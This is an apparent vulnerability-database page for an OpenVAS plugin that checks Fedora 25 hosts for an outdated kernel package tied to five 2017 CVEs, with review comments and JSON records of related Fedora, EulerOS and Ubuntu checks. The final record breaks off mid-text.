ID OPENVAS:1361412562310873847 Type openvas Reporter Copyright (C) 2017 Greenbone Networks GmbH Modified 2019-03-15T00:00:00
Description
The remote host is missing an update for the 'kernel' package(s) announced via the referenced advisory.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_fedora_2017_905bb449bc_kernel_fc25.nasl 14223 2019-03-15 13:49:35Z cfischer $
#
# Fedora Update for kernel FEDORA-2017-905bb449bc
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# Description phase: when `description` is set, this branch only registers the
# plugin's metadata and then exits, so none of the detection code below it runs.
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.873847");
script_version("$Revision: 14223 $");
script_tag(name:"last_modification", value:"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $");
script_tag(name:"creation_date", value:"2017-12-04 18:48:29 +0530 (Mon, 04 Dec 2017)");
# CVE identifiers this check is reported against. The plugin carries no
# per-CVE logic; all five are tied to the single package comparison further down.
script_cve_id("CVE-2017-16649", "CVE-2017-16650", "CVE-2017-16644", "CVE-2017-16647",
"CVE-2017-16994");
# CVSS v2 base score and vector: local access (AV:L), low complexity (AC:L),
# no authentication (Au:N), complete impact on confidentiality, integrity and
# availability (C:C/I:C/A:C). One score is attached to the whole advisory.
script_tag(name:"cvss_base", value:"7.2");
script_tag(name:"cvss_base_vector", value:"AV:L/AC:L/Au:N/C:C/I:C/A:C");
# Quality-of-detection type "package": the finding rests on a package version
# comparison, not on exercising or observing the flaws themselves.
script_tag(name:"qod_type", value:"package");
script_name("Fedora Update for kernel FEDORA-2017-905bb449bc");
script_tag(name:"summary", value:"The remote host is missing an update for the 'kernel'
package(s) announced via the referenced advisory.");
script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");
script_tag(name:"affected", value:"kernel on Fedora 25");
script_tag(name:"solution", value:"Please install the updated package(s).");
# Cross-references to the Fedora advisory id and its package-announce message.
script_xref(name:"FEDORA", value:"2017-905bb449bc");
script_xref(name:"URL", value:"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KEB5GUQMAQ4GH3P5ICPAF7FUXP2J27MN");
script_tag(name:"solution_type", value:"VendorFix");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2017 Greenbone Networks GmbH");
script_family("Fedora Local Security Checks");
# Depends on gather-package-list.nasl and requires the ssh/login/* keys below,
# with the release key matching FC25.
# NOTE(review): presumably these keys exist only after a successful authenticated
# SSH login to the target; if so, an unauthenticated scan skips this plugin
# entirely, and the absence of a finding must not be read as "patched" — confirm
# against the scan's authentication results.
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/fedora", "ssh/login/rpms", re:"ssh/login/release=FC25");
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-rpm.inc");
# Detection phase. rpm_get_ssh_release() is provided by an include (not shown
# here); when it yields no release string the plugin exits without reporting.
release = rpm_get_ssh_release();
if(!release)
exit(0);
res = "";
# Only the release string "FC25" is handled; for any other value the script
# simply reaches its end without a result.
if(release == "FC25")
{
# isrpmvuln() is defined outside this file. A non-NULL return value is passed
# unchanged to security_message() as the report text.
# NOTE(review): presumably it compares the installed 'kernel' RPM with
# 4.13.16-100.fc25 ('~' separating name, version and release) and flags older
# versions — confirm in pkg-lib-rpm.inc.
# NOTE(review): this is a package-level comparison only. It does not look at the
# kernel the host is currently running, so a host that installed the fixed RPM
# but has not rebooted would not be distinguished here; verify the running
# kernel separately when triaging.
if ((res = isrpmvuln(pkg:"kernel", rpm:"kernel~4.13.16~100.fc25", rls:"FC25")) != NULL)
{
security_message(data:res);
exit(0);
}
# __pkg_match is not assigned anywhere in this file.
# NOTE(review): presumably the include sets it when the package was found in
# the RPM list, and exit code 99 marks the host as checked and not vulnerable,
# while exit(0) leaves no verdict — confirm against the scanner's conventions.
if (__pkg_match) exit(99);
exit(0);
}
{"id": "OPENVAS:1361412562310873847", "type": "openvas", "bulletinFamily": "scanner", "title": "Fedora Update for kernel FEDORA-2017-905bb449bc", "description": "The remote host is missing an update for the ", "published": "2017-12-04T00:00:00", "modified": "2019-03-15T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873847", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["2017-905bb449bc", "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KEB5GUQMAQ4GH3P5ICPAF7FUXP2J27MN"], "cvelist": ["CVE-2017-16649", "CVE-2017-16994", "CVE-2017-16647", "CVE-2017-16650", "CVE-2017-16644"], "lastseen": "2019-05-29T18:34:47", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310843824", "OPENVAS:1361412562310873817", "OPENVAS:1361412562310843500", "OPENVAS:1361412562311220191501", "OPENVAS:1361412562311220171319", "OPENVAS:1361412562310843492", "OPENVAS:1361412562311220171291", "OPENVAS:1361412562310843493", "OPENVAS:1361412562310874400", "OPENVAS:1361412562310874366"]}, {"type": "fedora", "idList": ["FEDORA:25BDD6190ECF", "FEDORA:E6F08605DCE7", "FEDORA:4832F6079717", "FEDORA:74245604D4DA", "FEDORA:1CF5E61A25A8", "FEDORA:1EFCC607D641", "FEDORA:D668A604CC02", "FEDORA:AB52460321C9", "FEDORA:08D3760E6566", "FEDORA:DF5176048167"]}, {"type": "cve", "idList": ["CVE-2017-16650", "CVE-2017-16649", "CVE-2017-16994", "CVE-2017-16644", "CVE-2017-16647"]}, {"type": "nessus", "idList": ["EULEROS_SA-2019-1501.NASL", "UBUNTU_USN-3617-1.NASL", "UBUNTU_USN-3617-2.NASL", "FEDORA_2017-905BB449BC.NASL", "FEDORA_2017-F9F3D80442.NASL", "UBUNTU_USN-3617-3.NASL", "FEDORA_2017-92A0AE09AA.NASL", "EULEROS_SA-2017-1291.NASL", "EULEROS_SA-2017-1319.NASL", "ALA_ALAS-2017-937.NASL"]}, {"type": "seebug", "idList": ["SSV:96915"]}, {"type": "amazon", "idList": ["ALAS-2017-937"]}, {"type": 
"zdt", "idList": ["1337DAY-ID-30016", "1337DAY-ID-30015"]}, {"type": "exploitdb", "idList": ["EDB-ID:44304", "EDB-ID:44303"]}, {"type": "ubuntu", "idList": ["USN-3617-1", "USN-3617-3", "USN-3822-2", "USN-3619-2", "USN-3619-1", "USN-3617-2", "USN-3822-1"]}, {"type": "redhat", "idList": ["RHSA-2018:0502"]}, {"type": "suse", "idList": ["SUSE-SU-2017:3210-1", "SUSE-SU-2018:0785-1", "SUSE-SU-2017:3249-1"]}, {"type": "oraclelinux", "idList": ["ELSA-2018-4108", "ELSA-2019-4644", "ELSA-2020-5837", "ELSA-2018-4089", "ELSA-2017-3651", "ELSA-2018-4088"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:E36E8558D6E84664F9D34B4A9E5179AC"]}], "modified": "2019-05-29T18:34:47", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2019-05-29T18:34:47", "rev": 2}, "vulnersScore": 7.7}, "pluginID": "1361412562310873847", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_905bb449bc_kernel_fc25.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2017-905bb449bc\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873847\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-04 18:48:29 +0530 (Mon, 04 Dec 2017)\");\n script_cve_id(\"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16644\", \"CVE-2017-16647\",\n \"CVE-2017-16994\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2017-905bb449bc\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-905bb449bc\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KEB5GUQMAQ4GH3P5ICPAF7FUXP2J27MN\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 
re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.13.16~100.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "naslFamily": "Fedora Local Security Checks"}
{"openvas": [{"lastseen": "2019-05-29T18:34:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16649", "CVE-2017-16994", "CVE-2017-16647", "CVE-2017-16650", "CVE-2017-16644"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-12-04T00:00:00", "id": "OPENVAS:1361412562310873817", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873817", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2017-92a0ae09aa", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_92a0ae09aa_kernel_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2017-92a0ae09aa\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873817\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-04 18:47:52 +0530 (Mon, 04 Dec 2017)\");\n script_cve_id(\"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16644\", \"CVE-2017-16647\",\n \"CVE-2017-16994\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2017-92a0ae09aa\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-92a0ae09aa\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JSM7QJRIA5LBSE4QU5MBVROAQBX4KL7K\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 
re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.13.16~300.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:33:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16649", "CVE-2017-1000410", "CVE-2017-16650", "CVE-2017-16643", "CVE-2017-16644", "CVE-2017-16645"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171319", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171319", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2017-1319)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1319\");\n script_version(\"2020-01-23T11:06:56+0000\");\n script_cve_id(\"CVE-2017-1000410\", \"CVE-2017-16643\", \"CVE-2017-16644\", \"CVE-2017-16645\", \"CVE-2017-16649\", \"CVE-2017-16650\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:06:56 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:06:56 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2017-1319)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1319\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1319\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2017-1319 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A flaw was found in the processing of incoming L2CAP bluetooth commands. 
Uninitialized stack variables can be sent to an attacker leaking data in kernel address space.(CVE-2017-1000410)\n\nThe qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16650)\n\nThe usbnet_generic_cdc_bind function in drivers/net/usb/cdc_ether.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16649)\n\nThe ims_pcu_get_cdc_union_desc function in drivers/input/misc/ims-pcu.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (ims_pcu_parse_cdc_data out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16645)\n\nThe hdpvr_probe function in drivers/media/usb/hdpvr/hdpvr-core.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (improper error handling and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16644)\n\nThe parse_hid_report_descriptor function in drivers/input/tablet/gtco.c in the Linux kernel before 4.13.11 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16643)\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = 
\"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.59.59.46.h35\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~327.59.59.46.h35\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~327.59.59.46.h35\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~327.59.59.46.h35\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~327.59.59.46.h35\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.59.59.46.h35\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~327.59.59.46.h35\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.59.59.46.h35\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.59.59.46.h35\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~327.59.59.46.h35\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~327.59.59.46.h35\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:22", "bulletinFamily": "scanner", "cvelist": 
["CVE-2017-17450", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-0861", "CVE-2017-17805", "CVE-2017-16532", "CVE-2017-16649", "CVE-2018-5344", "CVE-2017-16537", "CVE-2017-18204", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-17448", "CVE-2017-16646", "CVE-2017-16647", "CVE-2018-5332", "CVE-2017-16650", "CVE-2017-17807", "CVE-2018-1000026", "CVE-2017-16645", "CVE-2017-17806"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310843500", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843500", "type": "openvas", "title": "Ubuntu Update for linux-raspi2 USN-3617-3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3617_3.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-raspi2 USN-3617-3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843500\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-06 09:58:11 +0200 (Fri, 06 Apr 2018)\");\n script_cve_id(\"CVE-2017-0861\", \"CVE-2017-15129\", \"CVE-2017-16532\", \"CVE-2017-16537\",\n \"CVE-2017-16645\", \"CVE-2017-16646\", \"CVE-2017-16647\", \"CVE-2017-16649\",\n \"CVE-2017-16650\", \"CVE-2017-16994\", \"CVE-2017-17448\", \"CVE-2017-17450\",\n \"CVE-2017-17741\", \"CVE-2017-17805\", \"CVE-2017-17806\", \"CVE-2017-17807\",\n \"CVE-2017-18204\", \"CVE-2018-1000026\", \"CVE-2018-5332\", \"CVE-2018-5333\",\n \"CVE-2018-5344\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-raspi2 USN-3617-3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-raspi2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that a race condition\n leading to a use-after-free vulnerability existed in the ALSA PCM subsystem of\n the Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. 
(CVE-2017-0861) It was\n discovered that a use-after-free vulnerability existed in the network namespaces\n implementation in the Linux kernel. A local attacker could use this to cause a\n denial of service (system crash) or possibly execute arbitrary code.\n (CVE-2017-15129) Andrey Konovalov discovered that the usbtest device driver in\n the Linux kernel did not properly validate endpoint metadata. A physically\n proximate attacker could use this to cause a denial of service (system crash).\n (CVE-2017-16532) Andrey Konovalov discovered that the SoundGraph iMON USB driver\n in the Linux kernel did not properly validate device metadata. A physically\n proximate attacker could use this to cause a denial of service (system crash).\n (CVE-2017-16537) Andrey Konovalov discovered that the IMS Passenger Control Unit\n USB driver in the Linux kernel did not properly validate device descriptors. A\n physically proximate attacker could use this to cause a denial of service\n (system crash). (CVE-2017-16645) Andrey Konovalov discovered that the DiBcom\n DiB0700 USB DVB driver in the Linux kernel did not properly handle detach\n events. A physically proximate attacker could use this to cause a denial of\n service (system crash). (CVE-2017-16646) Andrey Konovalov discovered that the\n ASIX Ethernet USB driver in the Linux kernel did not properly handle suspend and\n resume events. A physically proximate attacker could use this to cause a denial\n of service (system crash). (CVE-2017-16647) Andrey Konovalov discovered that the\n CDC USB Ethernet driver did not properly validate device descriptors. A\n physically proximate attacker could use this to cause a denial of service\n (system crash). (CVE-2017-16649) Andrey Konovalov discovered that the QMI WWAN\n USB driver did not properly validate device descriptors. 
A physically proximate\n attacker could use this to cause a denial of service (system crash).\n (CVE-2017-16650) It was discovered that the HugeTLB component of the Linux\n kernel did not properly handle holes in hugetlb ranges. A local attacker could\n use this to expose sensitive information (kernel memory). (CVE-2017-16994) It\n was discovered that the netfilter component of the Linux did not properly\n restrict access to the connection tracking helpers list. A local attacker could\n use this to bypass intended access restrictions. (CVE-2017-17448) It was\n discovered that the netfilter passive O ... Description truncated, for more\n information please check the Reference URL\");\n script_tag(name:\"affected\", value:\"linux-raspi2 on Ubuntu 17.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3617-3\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3617-3/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU17\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-1016-raspi2\", ver:\"4.13.0-1016.17\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.13.0.1016.14\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2019-05-29T18:33:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-17450", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-0861", "CVE-2017-17805", "CVE-2017-16532", "CVE-2017-16649", "CVE-2018-5344", "CVE-2017-16537", "CVE-2017-18204", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-17448", "CVE-2017-16646", "CVE-2017-1000407", "CVE-2017-16647", "CVE-2018-5332", "CVE-2017-16650", "CVE-2017-17807", "CVE-2018-1000026", "CVE-2017-16645", "CVE-2017-17806"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2018-04-04T00:00:00", "id": "OPENVAS:1361412562310843492", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843492", "type": "openvas", "title": "Ubuntu Update for linux-gcp USN-3617-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3617_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-gcp USN-3617-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR 